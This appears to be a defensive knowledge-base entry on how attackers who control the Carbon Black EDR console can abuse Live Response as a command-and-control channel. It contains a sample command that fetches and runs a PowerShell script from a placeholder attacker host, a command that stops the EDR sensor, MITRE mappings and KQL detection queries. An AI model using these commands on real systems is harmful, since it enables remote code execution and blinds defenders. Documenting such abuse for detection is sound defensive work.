Project-Lost

Carbon Black (EDR / Defense)

Defense Evasion Execution Credential Access

References

Carbon Black is an enterprise EDR platform used for process monitoring, threat detection, and incident response. When attackers obtain access to the Carbon Black console or API keys, they can abuse these capabilities for remote code execution and defense evasion.

Abusing Live Response

Description

Threat actors can use Carbon Black Live Response sessions to execute commands and scripts on endpoints, deploy additional tooling, or collect data. They may also issue commands to stop or uninstall the sensor on targeted hosts, reducing visibility. The capability turns Carbonblack into a full blown C2

Simulation

# Example pseudo Live Response usage (API / CLI)
cblr.exe -i <session_id> exec "powershell.exe -nop -w hidden -c IEX(New-Object Net.WebClient).DownloadString('http://attacker/p.ps1')"

# Stopping sensor service
sc stop carbonblack

MITRE ATT&CK

T1059 – Command and Scripting Interpreter
T1562.001 – Impair Defenses: Disable or Modify Tools
T1078 – Valid Accounts

Detections

DeviceProcessEvents
| where InitiatingProcessFileName in~ ("cblr.exe","cb.exe","cbcli.exe")
| project Timestamp, DeviceName, InitiatingProcessAccountName, ProcessCommandLine
DeviceProcessEvents
| where FileName =~ "sc.exe"
| where ProcessCommandLine has_any ("carbonblack","cbdefense","cbservice")
| project Timestamp, DeviceName, InitiatingProcessAccountName, ProcessCommandLine